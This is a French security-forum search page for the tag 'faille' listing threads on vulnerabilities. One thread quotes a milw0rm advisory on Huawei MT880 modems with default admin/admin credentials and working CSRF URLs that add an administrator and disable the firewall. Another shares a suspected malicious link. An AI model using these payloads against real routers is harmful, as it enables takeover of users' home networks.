Rechercher dans la communauté
Affichage des résultats pour les étiquettes 'faille'.
6 résultats trouvés
-
[problème] Le Preuve que les Serveur de OVH ne sont pas aussi Sécurisé
ColdFire a posté un sujet dans Sécurité Informatique
................................ -
Bonsoir J'ai trouvé par hasard ce sujet sur le site milworm.com concernant une vulnérabilité sur nos modems Fawri MT880, ya t il quelqu'un qui peut m'expliquer cette vulnérabilité. Description: Huawei MT880 is a device offered by the algerian telecom operator - FAWRI, to provide ADSL Internet connexion and it's already widely in use. Overview: Huawei MT880 firmware and its default configuration has flaws, which allows LAN users to gain unauthorized full access to device. Here are just limited PoCs. Default credentials on the web-based management interface: admin/admin Possible XSRFs: Adding an administrator user: http://admin:admin@192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70 Disabling firewall/anti-DoS... features: http://admin:admin@192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70 Adding a MAC address to the whitelist: http://admin:admin@192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insrcmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrcmac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=000000000000&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inblocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=000000000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insrcmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrcmac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104 Adding an IP address allowed by the firewall: http://admin:admin@192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7 Over flaws are not covered in this advisory. Cheers /JA # milw0rm.com [2009-08-24]
- 64 réponses
-
- algérietélecom
- east adsl
-
(et 3 en plus)
Étiqueté avec :
-
Microsoft publie un avis de sécurité sur la faille IE 6
mouzak a posté un sujet dans Sécurité Informatique
Source : Le journal du net. Source : Nouvelobs. -
Salam, Une faille vient d'être découverte et touche toutes les versions de PHP Le suite de l'article sur le blog de Korben : http://www.korben.info/uploadfaille-php-5-3-1-patch.html
-
Grosse faille dans Windows 7 / Server 2008 Microsoft a annoncé qu’il étudiait une faille importante dans Windows 7 et Server 2008 R2 pouvant faire planter un ordinateur à distance. Planter Windows en une seconde Le problème a été mis à jour par Laurant Gaffié qui a publié une preuve de concept montrant qu’il était possible de faire planter le kernel de ces systèmes d’exploitation à distance en envoyant un entête NetBIOS stipulant que le paquet SMB est plus ou moins grand qu’il ne l’est en réalité, tout en établissant une boucle infinie du protocole Server Message Block (SMB) de Windows responsable du partage de fichier. Le système d’exploitation va alors geler complètement, sans même présenter un écran bleu ou indiquer que quelque chose ne va pas et même après le redémarrage de la machine, les logs ne montrent aucun problème. La réponse de Microsoft Selon le développeur, il est possible d’exploiter ce bug quelque soit la configuration de votre pare-feu. Des experts en sécurité ont ainsi créé un site, qui a été retiré depuis, exploitant cette faille avec succès. En attendant, Microsoft, qui aurait reconnu le problème selon M. Gaffié, a affirmé qu’il faudrait peut-être attendre Windows 7 SP1 avant que cette faille soit comblée. Microsoft Conseille Ces Utilisateurs D'attendre la Prochaine Version De Windows 7 Qui Sera Intitulée SP1 Bonne Journée à Tous !!
- 5 réponses
-
Bonjour tout le monde, Je viens de rentrer chez moi et hop je vois un petit message sur msn qui m'attend, j'ai jeté un coup d'œil et j'ai trouvé que c'était un lien, (Plutot un virus) et bah voilà je vous invite à voir ce qu'il cache comme secret ce petit lien ou plutôt ces petits liens http://scs.go1.cc/?p=170 N'oubliez pas : Ne cliquez sur aucun lien ! La faille la plus visé c'est l'ignorance humaine donc .. pensez à ne pas cliquez sur n'importe quoi Salam